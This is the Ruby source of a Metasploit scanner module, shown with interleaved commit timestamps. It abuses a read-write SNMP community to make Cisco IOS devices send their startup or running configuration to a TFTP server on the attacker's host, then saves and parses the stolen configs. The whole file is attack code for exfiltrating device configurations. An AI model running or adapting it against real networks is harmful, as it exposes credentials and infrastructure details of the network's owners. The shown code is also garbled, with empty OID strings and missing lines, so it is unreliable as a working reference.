2010-12-11 23:36:37 +00:00
# $Id$
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient
include Msf::Auxiliary::Cisco
include Msf::Auxiliary::Scanner
def initialize
'Name' => 'Cisco IOS SNMP Configuration Grabber (TFTP)',
'Version' => '$Revision$',
'Description' => %q{
This module will download the startup or running configuration
2011-01-08 01:13:26 +00:00
from a Cisco IOS device using SNMP and TFTP. A read-write SNMP
community is required. The SNMP community scanner module can
2010-12-11 23:36:37 +00:00
assist in identifying a read-write community. The target must
be able to connect back to the Metasploit system and the use of
NAT will cause the TFTP transfer to fail.
'Author' =>
'pello <fropert@packetfault.org>', 'hdm'
'License' => MSF_LICENSE
OptEnum.new("SOURCE", [true, "Grab the startup (3) or running (4) configuration", "4", ["3","4"]]),
OptString.new('OUTPUTDIR', [ false, "The directory where we should save the configuration files (disabled by default)"]),
OptAddress.new('LHOST', [ false, "The IP address of the system running this module" ])
], self.class)
2010-12-30 16:37:58 +00:00
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# Start the TFTP Server
def setup
# Setup is called only once
print_status("Starting TFTP server...")
@tftp = Rex::Proto::TFTP::Server.new(69, '', { 'Msf' => framework, 'MsfExploit' => self })
@tftp.incoming_file_hook = Proc.new{|info| process_incoming(info) }
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@main_thread = ::Thread.current
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print_status("Scanning for vulnerable targets...")
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# Kill the TFTP server
def cleanup
# Cleanup is called once for every single thread
if ::Thread.current == @main_thread
# Wait 5 seconds for background transfers to complete
print_status("Providing some time for transfers to complete...")
::IO.select(nil, nil, nil, 5.0)
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print_status("Shutting down the TFTP service...")
if @tftp
@tftp.close rescue nil
@tftp = nil
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# Callback for incoming files
def process_incoming(info)
return if not info[:file]
name = info[:file][:name]
data = info[:file][:data]
from = info[:from]
return if not (name and data)
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# Trim off IPv6 mapped IPv4 if necessary
from = from[0].dup
from.gsub!('::ffff:', '')
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print_status("Incoming file from #{from} - #{name} #{data.length} bytes")
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# Save the configuration file if a path is specified
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if datastore['OUTPUTDIR']
name = "#{from}.txt"
path = ::File.join(datastore['OUTPUTDIR'], name)
::File.open(path, "wb") do |fd|
print_status("Saved configuration file to #{path}")
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# Toss the configuration file to the parser
cisco_ios_config_eater(from, 161, data)
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def run_host(ip)
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source = datastore['SOURCE'].to_i
protocol = 1
filename = "#{ip}.txt"
lhost = datastore['LHOST'] || Rex::Socket.source_address(ip)
ccconfigcopyprotocol = ""
cccopysourcefiletype = ""
cccopydestfiletype = ""
cccopyserveraddress = ""
cccopyfilename = ""
cccopyentryrowstatus = ""
session = rand(255) + 1
snmp = connect_snmp
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varbind = SNMP::VarBind.new("#{ccconfigcopyprotocol}#{session}" , SNMP::Integer.new(protocol))
value = snmp.set(varbind)
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# If the above line didn't throw an error, the host is alive and the community is valid
print_status("Trying to acquire configuration from #{ip}...")
varbind = SNMP::VarBind.new("#{cccopysourcefiletype}#{session}" , SNMP::Integer.new(source))
value = snmp.set(varbind)
varbind = SNMP::VarBind.new("#{cccopydestfiletype}#{session}", SNMP::Integer.new(1))
value = snmp.set(varbind)
varbind = SNMP::VarBind.new("#{cccopyserveraddress}#{session}", SNMP::IpAddress.new(lhost))
value = snmp.set(varbind)
varbind = SNMP::VarBind.new("#{cccopyfilename}#{session}", SNMP::OctetString.new(filename))
value = snmp.set(varbind)
varbind = SNMP::VarBind.new("#{cccopyentryrowstatus}#{session}", SNMP::Integer.new(1))
value = snmp.set(varbind)
varbind = SNMP::VarBind.new("#{cccopyentryrowstatus}#{session}", SNMP::Integer.new(6))
value = snmp.set(varbind)
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# No need to make noise about timeouts
2010-12-12 07:09:43 +00:00
rescue ::SNMP::RequestTimeout, ::Rex::ConnectionRefused
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rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}")